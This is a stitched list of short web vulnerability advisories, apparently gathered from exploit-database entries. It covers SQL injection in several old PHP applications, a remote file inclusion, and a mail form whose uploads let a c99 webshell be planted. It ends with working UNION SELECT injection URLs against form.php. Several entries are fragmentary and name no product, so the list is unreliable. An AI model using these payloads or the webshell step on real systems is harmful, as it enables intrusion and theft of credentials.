The vulnerability exists in PunBBAnnuaire version 0.4. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to inject malicious SQL queries and gain access to sensitive information from the database.
The Erotik Auktionshaus news.php script is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the server, which will then execute the malicious SQL query. This can be used to gain access to sensitive information such as passwords and other confidential data stored in the database.
Auktionshaus Gelb V.3 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'id' in the 'news.php' page. This can allow the attacker to gain access to the database and extract sensitive information such as passwords.
Auktionshaus V.4 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request contains a malicious SQL query in the 'id' parameter of the 'news.php' script. This can allow an attacker to gain access to sensitive information such as passwords from the database.
The vulnerability exists in the 'require_once' statement of the 'IDS/Init.php' file, which allows an attacker to include a remote file by manipulating the 'path' parameter in the URL.
Multiple File Attachments Mail Form Pro v2 is a commercial flash and php mail sender with multiattachments support. The webapp uploads the attachments of the mail with 777 permissions so you can upload a webshell and use it, the attachments are uploaded to the directory files. You access to the web with Multiple File Attachments Mail Form Pro v2. You attach a webshell like c99.php and you can use it in the folder files.
The uGround v1.0b SQL Injection vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. This can be exploited to gain access to sensitive information stored in the database, such as user credentials. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'download' parameter of the 'index.html' page.
An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the URL. The malicious query can be used to extract sensitive information from the database, such as usernames and passwords.
An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'id' in the 'articles.php' page. This can allow the attacker to gain access to the database and extract sensitive information.
www.site.com/form.php?id=null[Sql] www.site.com/form.php?id=-null+union+select+null,version(),null,user(),5,database(),7,null,null,10,null,null,13,null,null,16,17 T0 Bypass Forbidden www.site.com/form.php?id=-null+UNION+ALL+SELECT+null,version(),null,user(),5,database(),7,null,null,10,null,null,13,null,null,16,17
Services By CQR